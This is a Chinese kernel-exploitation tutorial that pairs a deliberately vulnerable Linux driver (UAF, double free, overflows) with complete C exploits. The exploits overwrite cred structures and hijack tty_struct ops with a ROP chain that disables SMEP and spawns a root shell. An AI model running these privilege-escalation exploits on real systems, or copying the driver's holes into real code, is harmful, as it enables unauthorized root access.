Kernel从0开始

299次阅读  |  发布于2年以前

简介

这里就尝试用堆来解题,由于kernel的解法多种多样,这里我们从最简单的UAF入手。 给出自己设计的堆题目,存在很多的漏洞,read越界读,edit越界写,UAF,Double Free等:


#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/kdev_t.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/cdev.h>
#include <asm/uaccess.h>
#include <linux/slab.h>

//设备驱动常用变量
//static char *buffer_var = NULL;
static char *buffer_var = NULL;
static struct class *devClass; // Global variable for the device class
static struct cdev cdev;
static dev_t stack_dev_no;


struct note
{
    int idx;
    int len;
    char* data;
};


//static char* notelist[1000];
static char* notelist[1000];
static struct note* noteChunk;
static int count = 0;



static ssize_t stack_read(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos);

static ssize_t stack_write(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos);

static long stack_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);

static int stack_open(struct inode *i, struct file *f);

static int stack_close(struct inode *i, struct file *f);



static struct file_operations stack_fops =
        {
                .owner = THIS_MODULE,
                .open = stack_open,
                .release = stack_close,
                .write = stack_write,
                .read = stack_read,
                .unlocked_ioctl = stack_ioctl
        };

// 设备驱动模块加载函数
static int __init stack_init(void)
{
    printk(KERN_INFO "[i] Module stack registered");
    if (alloc_chrdev_region(&stack_dev_no, 0, 1, "stack") < 0)
    {
        return -1;
    }
    if ((devClass = class_create(THIS_MODULE, "chardrv")) == NULL)
    {
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }
    if (device_create(devClass, NULL, stack_dev_no, NULL, "stack") == NULL)
    {
        printk(KERN_INFO "[i] Module stack error");
        class_destroy(devClass);
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }
    cdev_init(&cdev, &stack_fops);
    if (cdev_add(&cdev, stack_dev_no, 1) == -1)
    {
        device_destroy(devClass, stack_dev_no);
        class_destroy(devClass);
        unregister_chrdev_region(stack_dev_no, 1);
        return -1;
    }

    printk(KERN_INFO "[i] <Major, Minor>: <%d, %d>\n", MAJOR(stack_dev_no), MINOR(stack_dev_no));
    return 0;
}

// 设备驱动模块卸载函数
static void __exit stack_exit(void)
{
    // 释放占用的设备号
    unregister_chrdev_region(stack_dev_no, 1);
    cdev_del(&cdev);
}


// 读设备
ssize_t stack_read(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos)
{
    printk(KERN_INFO "Stack_read function" );
    copy_to_user(buf,buffer_var,len);
}

// 写设备
ssize_t stack_write(struct file *filp, const char __user *buf,
size_t len, loff_t *f_pos)  //buffer overflow
{
    printk(KERN_INFO "Stack_write function" );
    copy_from_user(buffer_var, buf, len);
    printk("[i] Module stack write: %s\n",buffer_var);
    return len;
}



// ioctl函数命令控制
long stack_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    char* chunk = NULL;
    int retval = 0;
    printk(KERN_INFO "Ioctl Get!\n");
    printk("notelist_addr:0x%llx\n",&notelist[0]);
    switch (cmd) {

        case 1://add
            //noteChunk = (char *)kmalloc(sizeof(struct Note),GFP_KERNEL);
            //copy_from_user(noteChunk, arg, sizeof(struct Note));

            printk("Kernel Add function!---001\n");
            noteChunk = (struct Note*)arg;
            chunk = (char *)kmalloc(noteChunk->len,GFP_KERNEL);
            printk("chunk_addr:0x%llx\n",chunk);
            if (!chunk)
            {
                printk("Alloca Error\n");
                return 0;
            }
            memcpy(chunk, noteChunk->data,noteChunk->len);
            notelist[count] = chunk;
            chunk = NULL;
            count ++;
            printk("Add Success!\n");
            break;

        case 888: //free without clean point and data
            printk("Kernel Free function!---888\n");
            noteChunk = (struct Note*)arg;
            printk("notelist:0x%llx\n",notelist[noteChunk->idx]);
            if (notelist[noteChunk->idx])
            {
                kfree(notelist[noteChunk->idx]);
                //notelist[noteChunk->idx] = NULL;
                printk("Free Success!\n");
            }
            else
            {
                printk("You can't free it!There is no chunk!\n");
            }
            break;

        case 3://edit   //UAF and overflow
            printk("Kernel Edit function!---003\n");
            noteChunk = (struct Note*)arg;
            if (notelist[noteChunk->idx])
            {
                memcpy(notelist[noteChunk->idx], noteChunk->data,noteChunk->len);
                printk("Edit Success!\n");
            }
            else
            {
                printk("You can't edit it!There is no chunk!\n");
            }
            break;

        case 4://read   //over read
            printk("Kernel Read function!---004\n");
            noteChunk = (struct Note*)arg;
            if(notelist[noteChunk->idx]){
                copy_to_user(noteChunk->data,notelist[noteChunk->idx],noteChunk->len);
                printk("Read Success!\n");
            }
            break;

        case 111: //Test add chunk
            printk("Test add chunk!---111\n");
            printk(KERN_INFO "No buffer_var!Malloc now!" );
            buffer_var=(char*)kmalloc(0xa8,GFP_KERNEL);
            printk("buffer_var:0x%llx\n",buffer_var);
            break;

        default:
            retval = -1;
            break;
    }   

    return retval;
}


static int stack_open(struct inode *i, struct file *f)
{
    printk(KERN_INFO "[i] Module stack: open()\n");
    return 0;
}

static int stack_close(struct inode *i, struct file *f)
{
    kfree(buffer_var);
    //buffer_var = NULL;
    printk(KERN_INFO "[i] Module stack: close()\n");
    return 0;
}

module_init(stack_init);
module_exit(stack_exit);

MODULE_LICENSE("GPL");
// MODULE_AUTHOR("blackndoor");
// MODULE_DESCRIPTION("Module vuln overflow");

利用Cred结构体提权

1、正常UAF

前置知识

由于是UAF漏洞,所以直接尝试再重启一个进程,这样新进程启动时就会申请一个Cred结构体(这里大小为0xa8)。而如果此时申请的结构体恰好落在我们释放过的堆块上,那么我们就可以利用UAF漏洞修改Cred结构体,将其uid和gid改为0,再利用该进程原地起shell,就能获得root权限的shell了。

这里同样需要一点前置知识,之前也写过类似的,其实就相当于修改某个进程的cred结构体中的uid和gid就能将该进程提权了,之后利用提权后的进程起shell得到的shell就是提权后的shell。

比较简单,这里直接给:

POC


#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>


struct addNote
{
    size_t len;
    char* data;
};

struct editNote
{
    size_t idx;
    size_t len;
    char* data;
};



//open dev
int openDev(char* pos);
void addFun(int fd,struct addNote* arg);
void freeFun(int fd,struct editNote* arg);
void editFun(int fd,struct editNote* arg);
void readFun(int fd,struct editNote* arg);


int main(int argc, char *argv[])
{
    int fd;
    int idFork;
    unsigned long memOffset;
    struct addNote addChunk;
    struct editNote readChunk;
    struct editNote editChunk;

    //open Dev
    char* pos = "/dev/stack";
    fd = openDev(pos);

    char credBuf[0xa8] = {0};
    addChunk.len = 0xa8;
    addChunk.data = credBuf;
    addFun(fd,&addChunk);

    editChunk.idx = 0;
    freeFun(fd,&editChunk);

    idFork = fork();
    editChunk.data = credBuf;
    editChunk.len = 28;
    if(idFork == 0){
        //get into 28*0 to set uid and gid 0
        editFun(fd,&editChunk);    
        if(getuid() == 0){
            printf("[*]welcome root:\n");
            system("/bin/sh");
            return 0;
        }
    }
    else if(idFork < 0){
        printf("[*]fork fail\n");
    }
    else{
        wait(NULL);
    }

    return 0;

}


int openDev(char* pos){
    int fd;
    printf("[+] Open %s...\n",pos);
    if ((fd = open(pos, O_RDWR)) < 0) {
        printf("    Can't open device file: %s\n",pos);
        exit(1);
    }
    return fd;
}

void addFun(int fd, struct addNote* arg)
{
    ioctl(fd,1,arg);
}

void freeFun(int fd, struct editNote* arg)
{
    ioctl(fd,888,arg);
}

void editFun(int fd, struct editNote* arg)
{
    ioctl(fd,3,arg);
}

void readFun(int fd, struct editNote* arg)
{
    ioctl(fd,4,arg);
}

这里还需要说明的是,cred结构体大小在我编译的4.4.72中为0xa8,在不同内核版本可能不同,通常可以查看对应版本的Linux内核源码或者写个简便的C程序运行一下即可知道。

2、伪条件竞争造成的UAF(多进程)

前置知识

前面我们的UAF是正常的指针未置空的UAF,但如果在程序中是add函数申请chunk,只有在关闭设备时才会释放chunk。那么这样当我们对一个设备进行操作时,只有在关闭设备时才能释放chunk,这就无法显著地造成UAF。但是如果能够对同一个设备打开两次 (操作符分别为fd1、fd2) ,申请一个堆块后,关闭掉第一个设备fd1后,就能释放该堆块。之后利用fd2继续对设备进行写操作,就能够继续修改释放掉的堆块了,这样就造成了一个UAF漏洞。同样也是利用cred结构体进行提权。

同样直接给出poc即可。

POC

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>





struct addNote
{
    size_t len;
    char* data;
};

struct editNote
{
    size_t idx;
    size_t len;
    char* data;
};



//open dev
int openDev(char* pos);
void addFun(int fd,struct addNote* arg);
void freeFun(int fd,struct editNote* arg);
void editFun(int fd,struct editNote* arg);
void readFun(int fd,struct editNote* arg);


int main(int argc, char *argv[])
{
    int fd1,fd2;
    int idFork,idBefore;
    unsigned long memOffset;
    struct addNote addChunk;
    struct editNote readChunk;
    struct editNote editChunk;
    //char *mycred;

    //mycred = current_user_ns();
    //printf("Cred_addr:0x%llx\n",mycred);

    //open Dev
    char* pos = "/dev/stack";
    char credBuf[0xa8] = {0};
    fd1 = openDev(pos);
    fd2 = openDev(pos);
    ioctl(fd1,111,editChunk); //test add
    close(fd1);

    idFork = fork();
    printf("idFork:%d\n",idFork);

    if(idFork == 0){
        //get into 28*0 to set uid and gid 0
        idBefore = getuid();
        printf("Before uid:%d\n",idBefore);
        write(fd2, credBuf, 28);

        if(getuid() == 0){
            printf("[*]welcome root:\n");
            system("/bin/sh");
            return 0;
        }
    }
    else if(idFork < 0){
        printf("[*]fork fail\n");
    }
    else{
        wait(NULL);
    }

    return 0;

}


int openDev(char* pos){
    int fd;
    printf("[+] Open %s...\n",pos);
    if ((fd = open(pos, O_RDWR)) < 0) {
        printf("    Can't open device file: %s\n",pos);
        exit(1);
    }
    return fd;
}

void addFun(int fd, struct addNote* arg)
{
    ioctl(fd,1,arg);
}

void freeFun(int fd, struct editNote* arg)
{
    ioctl(fd,888,arg);
}

void editFun(int fd, struct editNote* arg)
{
    ioctl(fd,3,arg);
}

void readFun(int fd, struct editNote* arg)
{
    ioctl(fd,4,arg);
}

劫持tty_struct结构体

这个真是调了我无敌久。

原理

1、函数调用链

entry_SYSCALL_64->SyS_write->SYSC_write->vfs_write->__vfs_write->tty_write->do_tty_write->n_tty_write->pty_write

这里我们需要的就是劫持某个结构体,从而使得原本通过该结构体调用pty_write函数指针变为调用我们的ROP链条。

2、劫持栈

由于用户空间和内核空间得返回进入需要用到栈,所以一般需要进行栈劫持,这里我们可以看到当通过ptmx进入其write函数时,rax为从tty_struct中获取的operations ops指针,而此时该指针已经被我们劫持了,所以如果有类似于mov rsp、rax之类的gadget就能将栈劫持到我们可控的operations ops指针指向的内存处,那么之后就很容易进行内核和用户空间的转换。

这里就用到常用的一个gadget。

movRspRax_decEbx_ret

3、结构体

这个之前也是讲过的。


struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;

    /* Protects ldisc changes: Lock tty not pty */
    struct ld_semaphore ldisc_sem;
    struct tty_ldisc *ldisc;

    struct mutex atomic_write_lock;
    struct mutex legacy_mutex;
    struct mutex throttle_mutex;
    struct rw_semaphore termios_rwsem;
    struct mutex winsize_mutex;
    spinlock_t ctrl_lock;
    spinlock_t flow_lock;
    /* Termios values are protected by the termios rwsem */
    struct ktermios termios, termios_locked;
    struct termiox *termiox; /* May be NULL for unsupported */
    char name[64];
    struct pid *pgrp; /* Protected by ctrl lock */
    struct pid *session;
    unsigned long flags;
    int count;
    struct winsize winsize; /* winsize_mutex */
    unsigned long stopped:1, /* flow_lock */
        flow_stopped:1,
        unused:BITS_PER_LONG - 2;
    int hw_stopped;
    unsigned long ctrl_status:8, /* ctrl_lock */
        packet:1,
        unused_ctrl:BITS_PER_LONG - 9;
    unsigned int receive_room; /* Bytes free for queue */
    int flow_change;

    struct tty_struct *link;
    struct fasync_struct *fasync;
    int alt_speed; /* For magic substitution of 38400 bps */
    wait_queue_head_t write_wait;
    wait_queue_head_t read_wait;
    struct work_struct hangup_work;
    void *disc_data;
    void *driver_data;
    struct list_head tty_files;

#define N_TTY_BUF_SIZE 4096

    int closing;
    unsigned char *write_buf;
    int write_cnt;
    /* If the tty has a pending do_SAK, queue it here - akpm */
    struct work_struct SAK_work;
    struct tty_port *port;
};

当我们打开ptmx设备时,会使用kmalloc申请这个tty_struct结构,如果存在一个UAF漏洞,那么就可以将该tty_struct申请为我们释放掉的一个chunk,其中重要的是int magic;和const struct tty_operations *ops;这两个结构体成员。

magic成员

这个在网上很多人都直接将其设置为0,但是在某些版本中,如果直接设置为0,通常可能出现以下的错误: 也就是magic number检测错误,这个经过调试可以发现,实际申请结构体之后是不变的: 可以得到如下的数值: 这个在后面的数值设置中可以用到,需要我们来调试才可以,不然其实如果直接设置为0也容易出错。

另外其中的driver可以设置为0,所以一般直接设置tty_struct[3]和tty_struct[0]即可。

ops成员

这个const struct tty_operations *ops结构体指针在该做法里被劫持为我们设置fake_operations指针,有如下结构体,设置fake_operations中的write函数指针为ROP链条,就可以通过调用ptmx设备中的write函数,从而调用到我们设置的ROP链条。

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
    struct inode *inode, int idx);
    int (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int (*write)(struct tty_struct * tty,
        const unsigned char *buf, int count);
    int (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int (*write_room)(struct tty_struct *tty);
    int (*chars_in_buffer)(struct tty_struct *tty);
    int (*ioctl)(struct tty_struct *tty,
        unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
        unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
        unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
    struct serial_icounter_struct *icount);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    const struct file_operations *proc_fops;
};

4、最终结构

fake_tty_struct结构体

fake_tty_operation结构体

POC

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <assert.h>
#include <linux/tty.h>


struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t   prepare_kernel_cred;
commit_creds_t    commit_creds;

unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long user_sp;

#define tty_size 0x2e0


struct addNote
{
    size_t len;
    char* data;
};

struct editNote
{
    size_t idx;
    size_t len;
    char* data;
};



//ROP func
unsigned long findAddr();
void save_state();
void getroot (void);
void shell(void);

//open dev
int openDev(char* pos);
void addFun(int fd,struct addNote* arg);
void freeFun(int fd,struct editNote* arg);
void editFun(int fd,struct editNote* arg);
void readFun(int fd,struct editNote* arg);


int main(int argc, char *argv[])
{
    int fd,fd_tty;
    char buf[0x10];
    int i = 0;
    unsigned long memOffset;
    struct addNote addChunk;
    struct editNote readChunk;
    struct editNote editChunk;

    unsigned long smpOffset = 0x1146000;
    memOffset = findAddr();

    //debug kernel
    unsigned long vmBase = memOffset - smpOffset;
    unsigned long pop_rdi_ret = vmBase + 0x3d032d;
    unsigned long pop_rax_rbx_r12_r13_rbp_ret = vmBase + 0x46c45e;
    unsigned long movCr4Rdi_pop_rbp_ret = vmBase + 0x004c40;
    unsigned long movRspRax_decEbx_ret = vmBase + 0x805115;
    unsigned long swapgs_sysret = (unsigned long)vmBase + 0x60ba2;
    unsigned long swapgs_popRbp_ret = (unsigned long)vmBase + 0x60394;
    unsigned long iretq = (unsigned long)vmBase + 0x803857;
    unsigned long getR = (unsigned long)getroot;
    unsigned long sh = (unsigned long)shell;
    unsigned long sp;
    size_t rop[32];

    commit_creds        = (commit_creds_t)(vmBase + 0x9f4a0);
    prepare_kernel_cred = (prepare_kernel_cred_t)(vmBase + 0x9f870);


    // unsigned long vmBase = memOffset - smpOffset;
    // unsigned long pop_rdi_ret = vmBase + 0xFE3542;

    // unsigned long pop_rax_rbx_r12_rbp_ret = vmBase + 0x3794b9;
    // unsigned long movCr4Rax_pop_rbp_ret = vmBase + 0xe0e4;
    // unsigned long movRspRax_decEbx_ret = vmBase + 0x8841CF;
    // unsigned long getR = (unsigned long)getroot;
    // unsigned long swapgs_ret = (unsigned long)vmBase + 0x884188;
    // unsigned long iretq = (unsigned long)vmBase + 0x882d77;
    // unsigned long sh = (unsigned long)shell;

    //print part
    printf("pop_rdi_ret:0x%llx\n",pop_rdi_ret);
    printf("movCr4Rdi_pop_rbp_ret:0x%llx\n",movCr4Rdi_pop_rbp_ret);
    printf("movRspRax_decEbx_ret:0x%llx\n",movRspRax_decEbx_ret);
    printf("iretq:0x%llx\n",iretq);

    //open Dev
    char* pos = "/dev/stack";
    fd = openDev(pos);
    char ttyBuf[tty_size] = {'0'};
    addChunk.len = tty_size;
    addChunk.data = ttyBuf;
    addFun(fd,&addChunk);


    void* fake_tty_operations[30];
    for(int i = 0; i < 30; i++)
    {
        fake_tty_operations[i] = movRspRax_decEbx_ret;
    }
    fake_tty_operations[0] = pop_rax_rbx_r12_r13_rbp_ret;
    fake_tty_operations[1] = (size_t)rop;

    size_t fake_tty_struct[4] = {0};
    fake_tty_struct[0] = 0x0000000100005401;//need to set magic number
    fake_tty_struct[1] = 0;
    fake_tty_struct[2] = 0;
    fake_tty_struct[3] = (size_t)fake_tty_operations;



    editChunk.idx = 0;
    editChunk.len = 0x20;
    editChunk.data = fake_tty_struct;

    freeFun(fd,&editChunk);

    pos = "/dev/ptmx";
    fd_tty = openDev(pos);
    printf("fd_tty:0x%d\n",fd_tty);
    editFun(fd, &editChunk);


    //rop set
    save_state();
    rop[i++] = pop_rdi_ret;      // pop_rax_rbx_r12_rbp_ret
    rop[i++] = 0x6f0;
    rop[i++] = movCr4Rdi_pop_rbp_ret;      // mov cr4, rax; pop rbp; ret;
    rop[i++] = 0;
    rop[i++] = (size_t)getR;
    rop[i++] = swapgs_popRbp_ret;      // swapgs;ret
    rop[i++] = 0x0;
    rop[i++] = iretq;      // iretq
    rop[i++] = (size_t)sh;
    rop[i++] = user_cs;                /* saved CS */
    rop[i++] = user_rflags;            /* saved EFLAGS */
    rop[i++] = user_sp;
    rop[i++] = user_ss;

    write(fd_tty,buf,0x10);

    return 0;

}


int openDev(char* pos){
    int fd;
    printf("[+] Open %s...\n",pos);
    if ((fd = open(pos, O_RDWR)) < 0) {
        printf("    Can't open device file: %s\n",pos);
        exit(1);
    }
    return fd;
}

void addFun(int fd, struct addNote* arg)
{
    ioctl(fd,1,arg);
}

void freeFun(int fd, struct editNote* arg)
{
    ioctl(fd,888,arg);
}

void editFun(int fd, struct editNote* arg)
{
    ioctl(fd,3,arg);
}

void readFun(int fd, struct editNote* arg)
{
    ioctl(fd,4,arg);
}


void save_state() {
   __asm__("mov %cs,user_cs;"
           "mov %ss,user_ss;"
           "mov %rsp,user_sp;"
           "pushf;"
           "pop user_rflags;"
           );
  puts("user states have been saved!!");
}


void shell(void) {
  printf("[+] getuid() ...");
  if(!getuid()) {
    printf(" [root]\n[+] Enjoy your shell...\n");
    system("/bin/sh");
  } else {
    printf("[+] not root\n[+] failed !!!\n");
  }
}

/* function to get root id */
void getroot (void)
{
  commit_creds(prepare_kernel_cred(0));
}

unsigned long findAddr() {

    char line[512];
    char string[] = "Freeing SMP alternatives memory";
    char found[17];
    unsigned long addr=0;

    /* execute dmesg and place result in a file */
    printf("[+] Excecute dmesg...\n");
    system("dmesg > /tmp/dmesg");

    printf("[+] Find usefull addr...\n");
    FILE* file = fopen("/tmp/dmesg", "r");

    while (fgets(line, sizeof(line), file)) {
        if(strstr(line,string)) {
            strncpy(found,line+53,16);
            sscanf(found,"%p",(void **)&addr);
            break;
        }
    }
    fclose(file);

    if(addr==0) {
        printf("    dmesg error...\n");
        exit(1);
    }

    return addr;

}

执行流程

这里还得说一下执行流程,比较不好调试。

即先是依据write函数跳转到我们最开始设置的gadget,也就是movRspRax_decEbx_ret,然后将栈劫持为fake_tty_operations。之后再跳转到pop_rax_rbx_r12_r13_rbp_ret,将ROP赋值给rax,再ret到movRspRax_decEbx_ret,再将栈劫持为ROP,之后就ret到ROP链条中的pop_rdi_ret了,之后执行流可控。

▲注意事项:

swapgs;ret没有时,可以用加上pop的,只要最后ret到iretq即可。同样的gadget可以相互转换。

iretq类似于ret,直接一个指令即可。

寄存器保存需要在进入内核之前。

堆块申请时的规则需要是GFP_KERNEL才行,至少GFP_DMA不行。‍

Copyright© 2013-2020

All Rights Reserved 京ICP备2023019179号-8